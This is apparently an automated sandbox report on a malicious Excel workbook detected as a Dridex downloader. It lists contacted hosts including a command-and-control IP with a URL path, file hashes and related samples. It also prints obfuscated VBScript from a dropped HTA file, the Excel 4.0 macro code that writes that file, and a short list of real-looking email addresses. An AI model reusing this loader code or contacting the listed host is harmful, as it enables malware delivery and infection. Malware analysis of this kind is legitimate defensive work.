                                                                                                                                      unknown
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.office.com/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://augloop.office.com/v292CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://skyapi.live.net/Activity/92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://clients.config.office.net/user/v1.0/mac92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://dataservice.o365filtering.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://api.cortana.ai92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://onedrive.live.com92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drfalse
                                                                                                                                                    high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    132.148.135.183
                                                                                                                                                    unknownUnited States
                                                                                                                                                    398101GO-DADDY-COM-LLCUSfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                    Analysis ID:528007
                                                                                                                                                    Start date:24.11.2021
                                                                                                                                                    Start time:17:04:50
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 5m 15s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:subscription-673890410.xlsb
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:22
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal92.troj.expl.evad.winXLSB@5/9@0/1
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsb
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Active AutoShape Object
                                                                                                                                                    • Active Picture Object
                                                                                                                                                    • Active Picture Object
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.35.237.194, 23.211.6.115, 52.109.6.42, 52.109.8.22, 52.109.88.40
                                                                                                                                                    • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, e16646.dscg.akamaiedge.net, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, storeedgefd.dsx.mp.microsoft.com
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    17:06:42API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                    17:06:44API Interceptor1x Sleep call for process: mshta.exe modified

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    132.148.135.183tax payment52023.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    tax payment52023.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    Offer 39052.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    payment_646921.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    payment_646921.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    GO-DADDY-COM-LLCUSsubscription-673890410.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    tax payment52023.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    tax payment52023.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    Offer 39052.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    payment_646921.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    payment_646921.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                    • 184.168.98.97
                                                                                                                                                    Euro invoice.exeGet hashmaliciousBrowse
                                                                                                                                                    • 148.66.138.164
                                                                                                                                                    New Order778880.exeGet hashmaliciousBrowse
                                                                                                                                                    • 173.201.188.238
                                                                                                                                                    c0az1l4js3001lsk4xd9n.x86-20211124-0850Get hashmaliciousBrowse
                                                                                                                                                    • 192.169.147.26
                                                                                                                                                    Euro invoice.exeGet hashmaliciousBrowse
                                                                                                                                                    • 148.66.138.164
                                                                                                                                                    8pTiccdV2s.exeGet hashmaliciousBrowse
                                                                                                                                                    • 69.64.47.51
                                                                                                                                                    DHL express 5809439160_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                    • 184.168.96.165
                                                                                                                                                    Payment transfer.exeGet hashmaliciousBrowse
                                                                                                                                                    • 148.66.138.249
                                                                                                                                                    k6j1IMWw7Q.exeGet hashmaliciousBrowse
                                                                                                                                                    • 184.168.119.143
                                                                                                                                                    704.docGet hashmaliciousBrowse
                                                                                                                                                    • 148.72.96.3
                                                                                                                                                    nHSmNKw7PN.exeGet hashmaliciousBrowse
                                                                                                                                                    • 184.168.119.143
                                                                                                                                                    New Order 000112221.exeGet hashmaliciousBrowse
                                                                                                                                                    • 173.201.188.238
                                                                                                                                                    1711.docGet hashmaliciousBrowse
                                                                                                                                                    • 72.167.40.83
                                                                                                                                                    new order.exeGet hashmaliciousBrowse
                                                                                                                                                    • 107.180.56.180

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\ProgramData\dDVVHyrpueA.txt
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):141
                                                                                                                                                    Entropy (8bit):4.507274801884702
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:YBIzlzDALGKJugNXVrpSMmWLKpxveLCMBAEWLdHYVg+FJIAWcItHWLp:YoV63FVrpuWL4x85AEWL+XKfWLp
                                                                                                                                                    MD5:788E1CDB3166D9A77BCDAFBA102A9CD9
                                                                                                                                                    SHA1:6E3B5E7D88960E4F6C2E72D0AA0C12AA0F012646
                                                                                                                                                    SHA-256:F31FE94EFEE87132BC7B3166B0E782A5654DA5B03F2725DD9B6625311C52B9DC
                                                                                                                                                    SHA-512:29BD5CF48A8DEE63D1BA19A145E7B63517C49C2EAC681D4B78BE1B76D930897BC7B93E4AA6E502EAA637F761B06980A05AB93A41B4A634342669E58D7485B29F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: {"d-mcdavid@callypalace.co.uk","krisallfrey@thelegalwizards.com","biedat@teachingideas.co","specs@specshoward.edu","mike@massgymnastics.com"}
                                                                                                                                                    C:\ProgramData\xkNURUQaCiKQrGY.rtf
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4848
                                                                                                                                                    Entropy (8bit):5.100246262290776
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:rezsygsHTgjLp6Zb6MHwl3lRud0Z1FE+HV5i97eUi:yIygfjLkZbEl1RuKTFE+syUi
                                                                                                                                                    MD5:C1900571D11AF55A6763912D47FD5294
                                                                                                                                                    SHA1:92421AA976D98FBE62524B7B11B89D703805FEC7
                                                                                                                                                    SHA-256:A843CE94D04A088A38905845A533C9AF834A2E41EF38FBFF8B61AE1F03ABAB13
                                                                                                                                                    SHA-512:A457F8359D927A969D273ED007A54A6372BF3E9BF5D1C7100DF5E686300025A192E789FEC9DBCD1FD9133499AFCA34E6B6820713C9C44FBB396137B28F1B48CD
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\xkNURUQaCiKQrGY.rtf, Author: Joe Security
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..U_X_a_r_Q_A_A_z_P_W_l_V_B_b_T = "" & Chr(114+1-1) & "un" & Chr(100+1-1) & "ll3" & "2.e" & Chr(120+1-1) & "e " & Chr(67+1-1) & ":\\" & "Pro" & "gra" & "mD" & "at" & Chr(97+1-1) & "\xn" & "igg" & "er" & Chr(46+1-1) & "bin" & "" & Chr(32+1-1) & "" & "Wsp" & "" & "Fre" & "eS" & "tr" & "" & "in" & Chr(103+1-1)..Set r_j_Q_x_s_O_M_K_o_y_A_P_F_p_Q_a_z = CreateObject(Chr(77+1-1) & "SXM" & "L2." & "" & "" & Chr(83+1-1) & "er" & "" & "ve" & "rX" & "ML" & Chr(72+1-1) & Chr(84+1-1) & "TP" & ".6" & ".0")....X_m_v_N_g_Z_S_q_D_h_O = "" & "" & "Ws" & "cr" & "" & "ip" & Chr(116+1-1) & ".S" & "hel" & Chr(108+1-1)..Set Q_g_H_K_N_c_E_s_V_z_t_D_z_D_n = CreateObject(X_m_v_N_g_Z_S_q_D_h_O)..Y_F_W_J_k_M_c_R_P_F_z_x_d_P_b_T = LCase(Q_g_H_K_N_c_E_s_V_z_t_D_z_D_n.expa
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\92CD3603-5ED7-4DD8-A9A4-90905E37531F
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):140143
                                                                                                                                                    Entropy (8bit):5.358592283581543
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:jcQIfgxrBdA3gBwtnQ9DQW+z2b4Ff7nXbovidXiE6LWmE9:5uQ9DQW+zNXfH
                                                                                                                                                    MD5:EB230664A57C0696B13912F4D62348F2
                                                                                                                                                    SHA1:9724D00DB7DBFBF5808EE7BAE19C63AC91FDD8D5
                                                                                                                                                    SHA-256:CF116E6EBF83B86D50A060BD29A08F88E95889300B81A5D53567F3345C15A00A
                                                                                                                                                    SHA-512:15475043071CE71E3FA3EB6BDFC957976A5E1BDED8FF706DEF4C99A87F3CBAB455DC77C2ACD367207D9154AB95C2146A1F03A34E361872EFBE123F2B52D790CE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-11-24T16:05:49">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\41A5AE62.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 238 x 337, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):38157
                                                                                                                                                    Entropy (8bit):7.96137177194393
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:7PiEGNOfxgpvUM7w1phhsL+ZfBwnTV+YoS2bUoMokqk++yd6OAd/r:7PFwJpvc1e+BwT8YIbDMz+1d6xt
                                                                                                                                                    MD5:B88B9DF024814E6C791FDAC471ABD26C
                                                                                                                                                    SHA1:6FB92BB20F7A51B40E03467C2EBB217A8E21E21A
                                                                                                                                                    SHA-256:02F3AB917A42A10560A274A9CD91FDA01D7BC428C7428CCAF8CCFF1F46DEA39F
                                                                                                                                                    SHA-512:67E6B7FAE7476847835E5A1F17FBFA60DC35B2AAC299A025102540BBA72D8A3CC120FA69E172FBADE6A4B68F464A98005FC38145CC618A6DC45D8C058F704E9E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.......Q.....s..6...JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4B5088A5.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 295 x 52, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2980
                                                                                                                                                    Entropy (8bit):7.906485537887338
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:ui8wWBWX0IWUQzsjVdrzBnS97W9ZUsBrTk/7YCoGPUYqekS3aTNg3UD+b5F7kl6S:TKD0QzsjVd3BnS9K9ZUs1LCoqUCYg3U3
                                                                                                                                                    MD5:C484A69A7647C62945060924243190F1
                                                                                                                                                    SHA1:078A31ACF519D8192E63CDEBA49815CC6361F9D6
                                                                                                                                                    SHA-256:A578E2C85FC0AB3264AACEEC5545C8C27F902DB0CCB8B2B3997964AC92F86933
                                                                                                                                                    SHA-512:9E9A1965B25C5C6373395A8D3E81C64BA9A55F269041C4273C9DE41CBB05BDDED7F4E3D1FE19E55AF6E05662576962B54BA14700C56AD38FE7943962E09E5362
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: .PNG........IHDR...'...4.....G.i....kIDATx..yX.....1...l..". ....K)7*ov.z.......JoR...d..mQ..i.....\q.S...E0.Ad.E.f.....^...W.s..g.8s.....=..}.s~.. z.q......v. .. ......BhHu.!4.:...R.A.... ..TG.BC.#..!......BhHu.!4.:...R.A.... ..TG.BC.#..!......Bh.=d7~.V...N$%.......?.?;.@.+....D,L..].vw.."_~n....j3%j...K.c........s........@...+.J..a....p.\........e..'.C.......oW.......*.^....C.i...<s.....6hV.I.....".\..-.e.fc.W......m...*np'...7.....Z....>}x.g.S'.t.@Cq.....56vga.?.7.4;.....G.._........V.....s..W5*...s...c."$=..+.{....M..?..o.X..j.....f.Y.5,..t...$....\...0V(?..AkN}..?.}L..>.F..v....z..i...G..yc>..../.~q1.{..<<..iw4.I...!s.L8..o..b...q.W-...`..nE..gH{..mN......)|.......9.7d.R{;./PHz.YW..p... .)#..)....X.2r..Y...LvS.._...{.L.. ...O.....u..w.................[[.xv....I.....>w...@]AQ.g)-7.}..F<. ....R.....u..Q.5.E...!.MxcY..C&.!.....+..._.K..H".^...`..Z.fM....s.....v....3..(...V..y.....O'.7....r[.|...0.x...#..g~...w4*U..............:.z.....S.k.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6076E6FB.tmp
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):70244
                                                                                                                                                    Entropy (8bit):7.880758716744984
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:7Y3isa9Sp9SEP1PFwJpvc1e+BwT8YIbDMz+1d6xcg/dg:7Wo9SpzyMrbDu+1d6xhdg
                                                                                                                                                    MD5:FB97089B5721E5969D83BA4DF7829E2C
                                                                                                                                                    SHA1:E274F9AEDC8B3B3CF33981886BCF4A425D749D5A
                                                                                                                                                    SHA-256:30E3F6BC11A76F0819BCB7E58CC684DE41EF64AE2B66A1A9C4EAF9A13540C948
                                                                                                                                                    SHA-512:D36BDB501128F00BB75CD8634F4E75BAE96E1291F7D2BE4596230A400A0E2897E8615A0C6575399446936CD22EBAFA3F658861472A63C10E946461E679D91129
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: PK..........!.?...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0....?..."......C..=....=3..&...L".}....`.Vr......W.........;6.3.WA.....o.'.`.^K.<tl.....-...!..mr...@..'....vV!9..5.E..A.A\.f...>..m.1.r..V.....]&.....B.1..5JfJT<y....+..7...@.-wR.p....DR.q2~..A|.J~e.4"...d..K..^3'dM.7&..2..C.9.y..E.JFCs+S.).9#z+.....z..GF...?..v.....^C?..p...G..Czx..#.2....;E....^.$.CEF.d:. .u..........(.A=::...9..3..yk...C..=&CS'...i...._...0&..6..|.~$1..s.h..v....<.j...fq..%=...n#.....
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG[1].txt
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):141
                                                                                                                                                    Entropy (8bit):4.507274801884702
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:YBIzlzDALGKJugNXVrpSMmWLKpxveLCMBAEWLdHYVg+FJIAWcItHWLp:YoV63FVrpuWL4x85AEWL+XKfWLp
                                                                                                                                                    MD5:788E1CDB3166D9A77BCDAFBA102A9CD9
                                                                                                                                                    SHA1:6E3B5E7D88960E4F6C2E72D0AA0C12AA0F012646
                                                                                                                                                    SHA-256:F31FE94EFEE87132BC7B3166B0E782A5654DA5B03F2725DD9B6625311C52B9DC
                                                                                                                                                    SHA-512:29BD5CF48A8DEE63D1BA19A145E7B63517C49C2EAC681D4B78BE1B76D930897BC7B93E4AA6E502EAA637F761B06980A05AB93A41B4A634342669E58D7485B29F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: {"d-mcdavid@callypalace.co.uk","krisallfrey@thelegalwizards.com","biedat@teachingideas.co","specs@specshoward.edu","mike@massgymnastics.com"}
                                                                                                                                                    C:\Users\user\Desktop\~$subscription-673890410.xlsb
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):165
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    \Device\ConDrv
                                                                                                                                                    Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):160
                                                                                                                                                    Entropy (8bit):5.095703110114614
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1Mgk7c/6JQAiveyzoa:Yw7gJGWMXJXKSOdYiygKkXe/egkgyeAc
                                                                                                                                                    MD5:C388CA0D74C486622FAF32D8BF57A12F
                                                                                                                                                    SHA1:7831EEDC22830962114C44D1A4F7718A73F28430
                                                                                                                                                    SHA-256:6B5750DB974AB5ECE110F4996632FFCD1E78652D894309DB5BAF5435E775DEAD
                                                                                                                                                    SHA-512:756572DB2DE1B1E721798FDA54C32A7E231B750D977A3799304299D920B55134C0D9175151AB9AFA5CFB14768E7FEF2E4A9D897244DD2E57840F1167304B291B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 6488;...ReturnValue = 0;..};....

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.872332333165425
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                                                                                                                                                    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                                                                                                                    • ZIP compressed archive (8000/1) 5.73%
                                                                                                                                                    File name:subscription-673890410.xlsb
                                                                                                                                                    File size:70272
                                                                                                                                                    MD5:47ee46b3521d1f85743ab56ac8c4f4b3
                                                                                                                                                    SHA1:a4b5e087009458f9a6a0e6f7b2e8ebbb261233f9
                                                                                                                                                    SHA256:444a0953b513aaad678d37e960dd7fe5841025e0bebf2e71eb350d4709a0f34f
                                                                                                                                                    SHA512:f37d22e2ed5999269df9dfe9e56a146a9acff9cc4ab91055ff03d1f9deedfa54fe95ff97962419bbda00ebfd67b271d61e151b91cd3c02d9d960587001f878e3
                                                                                                                                                    SSDEEP:1536:UW9PFwJpvc1e+BwT8YIbDMz+1d6xUBiNNQrU8Qh8Y42pW9SEPKgdi:VyMrbDu+1d6xUB+N18YLpWzigdi
                                                                                                                                                    File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "subscription-673890410.xlsb"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    0,564,=FOPEN("C:\Pr" & CHAR(111) & "gramD" & CHAR(97) & "ta" & CHAR(92) & "xkNURU" & CHAR(81) & CHAR(97) & "Ci" & CHAR(75) & "QrGY.rt" & CHAR(102), 3)
                                                                                                                                                    1,564,=D1008+C8202
                                                                                                                                                    4,564,=D8794+D1580
                                                                                                                                                    5,564,=D4348+B3960
                                                                                                                                                    6,564,=C119+C9883
                                                                                                                                                    7,564,=A1859+A9629
                                                                                                                                                    9,564,=A6435+D5222
                                                                                                                                                    11,564,=A8751+C3510
                                                                                                                                                    13,564,=FOR.CELL("YzlbOtjxp",Sheet1!AX158:BI561, TRUE)
                                                                                                                                                    20,564,=B1780+B3274
                                                                                                                                                    22,564,=D1522+A601
                                                                                                                                                    23,564,=B4601+B9463
                                                                                                                                                    24,564,=B7234+C2762
                                                                                                                                                    25,564,=FWRITE(0,CHAR(YzlbOtjxp))
                                                                                                                                                    26,564,=A6670+B9834
                                                                                                                                                    30,564,=A6108+C5040
                                                                                                                                                    35,564,=NEXT()
                                                                                                                                                    36,564,=C2633+D5053
